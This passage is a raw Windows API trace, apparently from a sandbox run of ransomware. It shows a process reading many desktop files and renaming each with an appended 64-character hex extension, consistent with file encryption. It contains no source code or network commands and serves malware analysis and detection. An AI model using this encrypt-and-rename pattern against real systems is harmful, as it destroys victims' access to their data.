returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\siEyKMkaJ2X9IA-.jpg.DA5AF7C664AF8293ECED6B283C31B8CBD16627734630917C9F4EC49A19347517" [0166.039] GetProcessHeap () returned 0x270000 [0166.039] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x12c) returned 0x741c7e8 [0166.039] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x741c7e8, Length=0x12c, FileInformationClass=0xa) returned 0x0 [0166.042] CloseHandle (hObject=0x5b0) returned 1 [0166.042] GetProcessHeap () returned 0x270000 [0166.044] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.044] RtlInterlockedCompareExchange64 () returned 0x1 [0166.044] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.049] ReadFile (in: hFile=0x5b0, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.049] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.051] NtQueryObject (in: Handle=0x5b0, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.053] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx", lpString2=".8AB45894099CDDF629F5851DE0D4405BF7A750200BEFC4957975E3EF6B224473" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx.8AB45894099CDDF629F5851DE0D4405BF7A750200BEFC4957975E3EF6B224473") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\ccAy71X\\zn7l9.xlsx.8AB45894099CDDF629F5851DE0D4405BF7A750200BEFC4957975E3EF6B224473" [0166.053] GetProcessHeap () returned 0x270000 [0166.053] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11a) returned 0x4277308 [0166.053] NtSetInformationFile (FileHandle=0x5b0, IoStatusBlock=0x6fef7e4, FileInformation=0x4277308, Length=0x11a, FileInformationClass=0xa) returned 0x0 [0166.054] CloseHandle (hObject=0x5b0) returned 1 [0166.056] GetProcessHeap () returned 0x270000 [0166.058] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.058] RtlInterlockedCompareExchange64 () returned 0x1 [0166.058] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.068] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.069] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.071] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.072] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a", lpString2=".6198D308F7C3837615D6ECB4E8337DB834FAD0C2B95935A6B31641667065447B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a.6198D308F7C3837615D6ECB4E8337DB834FAD0C2B95935A6B31641667065447B") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\CZ57sSSL.m4a.6198D308F7C3837615D6ECB4E8337DB834FAD0C2B95935A6B31641667065447B" [0166.072] GetProcessHeap () returned 0x270000 [0166.072] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10e) returned 0x42672b0 [0166.073] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42672b0, Length=0x10e, FileInformationClass=0xa) returned 0x0 [0166.075] CloseHandle (hObject=0x5ac) returned 1 [0166.076] GetProcessHeap () returned 0x270000 [0166.077] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.082] RtlInterlockedCompareExchange64 () returned 0x1 [0166.082] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.089] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.090] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.091] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.093] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png", lpString2=".EAD55FE28168EABC3AC968F5E8E1B1555100B9DFA3174A18FC6916C632F0685E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png.EAD55FE28168EABC3AC968F5E8E1B1555100B9DFA3174A18FC6916C632F0685E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\fW1l3mfnL9ahH.png.EAD55FE28168EABC3AC968F5E8E1B1555100B9DFA3174A18FC6916C632F0685E" [0166.093] GetProcessHeap () returned 0x270000 [0166.093] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x118) returned 0x4277430 [0166.093] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4277430, Length=0x118, FileInformationClass=0xa) returned 0x0 [0166.095] CloseHandle (hObject=0x5ac) returned 1 [0166.096] GetProcessHeap () returned 0x270000 [0166.098] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.098] RtlInterlockedCompareExchange64 () returned 0x1 [0166.098] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.101] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.102] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.104] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.105] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav", lpString2=".1384A7174E853B24DEE08F89D914EBC3A22A3E0B469CBE88461C10BCE6FE5807" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav.1384A7174E853B24DEE08F89D914EBC3A22A3E0B469CBE88461C10BCE6FE5807") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\gY8jhFMOKT6jD2Iu 4M.wav.1384A7174E853B24DEE08F89D914EBC3A22A3E0B469CBE88461C10BCE6FE5807" [0166.105] GetProcessHeap () returned 0x270000 [0166.105] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x124) returned 0x741c920 [0166.105] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741c920, Length=0x124, FileInformationClass=0xa) returned 0x0 [0166.107] CloseHandle (hObject=0x5ac) returned 1 [0166.107] GetProcessHeap () returned 0x270000 [0166.109] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.109] RtlInterlockedCompareExchange64 () returned 0x1 [0166.109] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.114] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.114] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.116] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.118] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv", lpString2=".59820713DC0E109AA227BCD1474F73A2204387DFEA4B54FA40B1091D1627F429" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv.59820713DC0E109AA227BCD1474F73A2204387DFEA4B54FA40B1091D1627F429") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\HRQrWoVqdDX0db4.csv.59820713DC0E109AA227BCD1474F73A2204387DFEA4B54FA40B1091D1627F429" [0166.118] GetProcessHeap () returned 0x270000 [0166.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11c) returned 0x4277558 [0166.118] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4277558, Length=0x11c, FileInformationClass=0xa) returned 0x0 [0166.120] CloseHandle (hObject=0x5ac) returned 1 [0166.121] GetProcessHeap () returned 0x270000 [0166.122] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.122] RtlInterlockedCompareExchange64 () returned 0x1 [0166.122] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.127] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.127] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.130] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.131] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg", lpString2=".94375F23EA7F26CB851A7C402BF8C7E78D9BD6B287ED377DA1314B01CF82832D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg.94375F23EA7F26CB851A7C402BF8C7E78D9BD6B287ED377DA1314B01CF82832D") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\jjaPO1 SfWeJ9Wx0cO.jpg.94375F23EA7F26CB851A7C402BF8C7E78D9BD6B287ED377DA1314B01CF82832D" [0166.131] GetProcessHeap () returned 0x270000 [0166.131] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x741ca58 [0166.131] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741ca58, Length=0x122, FileInformationClass=0xa) returned 0x0 [0166.133] CloseHandle (hObject=0x5ac) returned 1 [0166.134] GetProcessHeap () returned 0x270000 [0166.136] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.136] RtlInterlockedCompareExchange64 () returned 0x1 [0166.136] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.141] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.144] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.146] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.148] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi", lpString2=".837CA478DE1FA6974A3792C50CB6B619008A1BF17C11C6356A4A638E543BAB27" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi.837CA478DE1FA6974A3792C50CB6B619008A1BF17C11C6356A4A638E543BAB27") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\kgq2pSzeYt44pMh3hD.avi.837CA478DE1FA6974A3792C50CB6B619008A1BF17C11C6356A4A638E543BAB27" [0166.148] GetProcessHeap () returned 0x270000 [0166.148] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x122) returned 0x741cb90 [0166.148] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x741cb90, Length=0x122, FileInformationClass=0xa) returned 0x0 [0166.152] CloseHandle (hObject=0x5ac) returned 1 [0166.153] GetProcessHeap () returned 0x270000 [0166.156] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.156] RtlInterlockedCompareExchange64 () returned 0x1 [0166.156] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.160] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.161] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.163] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.164] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\MKov.avi", lpString2=".E1BF2A908DB8D221A6CDB8CC246A1DD48EC8923101F632291A3ED39006A87217" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\MKov.avi.E1BF2A908DB8D221A6CDB8CC246A1DD48EC8923101F632291A3ED39006A87217") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\MKov.avi.E1BF2A908DB8D221A6CDB8CC246A1DD48EC8923101F632291A3ED39006A87217" [0166.164] GetProcessHeap () returned 0x270000 [0166.164] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x106) returned 0x42673c8 [0166.165] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42673c8, Length=0x106, FileInformationClass=0xa) returned 0x0 [0166.167] CloseHandle (hObject=0x5ac) returned 1 [0166.167] GetProcessHeap () returned 0x270000 [0166.169] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.172] RtlInterlockedCompareExchange64 () returned 0x1 [0166.172] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.177] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.177] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.179] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.181] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg", lpString2=".D9FF3DBBB5DEB0B2C11A141E314281020D998BFD4787F87C7A3F1C00248AC46E" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg.D9FF3DBBB5DEB0B2C11A141E314281020D998BFD4787F87C7A3F1C00248AC46E") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\NMRn3Fz86tX17DjR6.jpg.D9FF3DBBB5DEB0B2C11A141E314281020D998BFD4787F87C7A3F1C00248AC46E" [0166.181] GetProcessHeap () returned 0x270000 [0166.181] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x120) returned 0x4277680 [0166.181] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x4277680, Length=0x120, FileInformationClass=0xa) returned 0x0 [0166.183] CloseHandle (hObject=0x5ac) returned 1 [0166.189] GetProcessHeap () returned 0x270000 [0166.191] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.191] RtlInterlockedCompareExchange64 () returned 0x1 [0166.192] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.196] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.196] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.198] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.199] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf", lpString2=".F70EE9D0E0BEF314C218B55111C949B7B5994C01CC58C24EF78228412C94DC36" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf.F70EE9D0E0BEF314C218B55111C949B7B5994C01CC58C24EF78228412C94DC36") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\nP4M5QM-M9H.pdf.F70EE9D0E0BEF314C218B55111C949B7B5994C01CC58C24EF78228412C94DC36" [0166.200] GetProcessHeap () returned 0x270000 [0166.200] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x114) returned 0x42f7f40 [0166.200] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f7f40, Length=0x114, FileInformationClass=0xa) returned 0x0 [0166.202] CloseHandle (hObject=0x5ac) returned 1 [0166.203] GetProcessHeap () returned 0x270000 [0166.206] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.206] RtlInterlockedCompareExchange64 () returned 0x1 [0166.206] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.209] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.209] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.211] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.212] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv", lpString2=".2A2D3CEFAB09E467CA70B052FC695B2BA9A0134A33DFBB455549117AD4971665" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv.2A2D3CEFAB09E467CA70B052FC695B2BA9A0134A33DFBB455549117AD4971665") returned="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\PfB5zoxaJHleqV31.flv.2A2D3CEFAB09E467CA70B052FC695B2BA9A0134A33DFBB455549117AD4971665" [0166.212] GetProcessHeap () returned 0x270000 [0166.212] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x11e) returned 0x42f8068 [0166.212] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x6fef7e4, FileInformation=0x42f8068, Length=0x11e, FileInformationClass=0xa) returned 0x0 [0166.215] CloseHandle (hObject=0x5ac) returned 1 [0166.216] GetProcessHeap () returned 0x270000 [0166.217] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0166.217] RtlInterlockedCompareExchange64 () returned 0x1 [0166.217] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.219] ReadFile (in: hFile=0x5ac, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0166.219] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x6fef800, lpCompletionKey=0x6fef7fc, lpOverlapped=0x6fef7f8) returned 1 [0166.221] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x6fef7f4 | out: ObjectInformation=0x74c20b8, ReturnLength=0x6fef7f4) returned 0x0 [0166.222] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\5AlR3U30D3\\Desktop\\rJo4UNhUAI_.png", 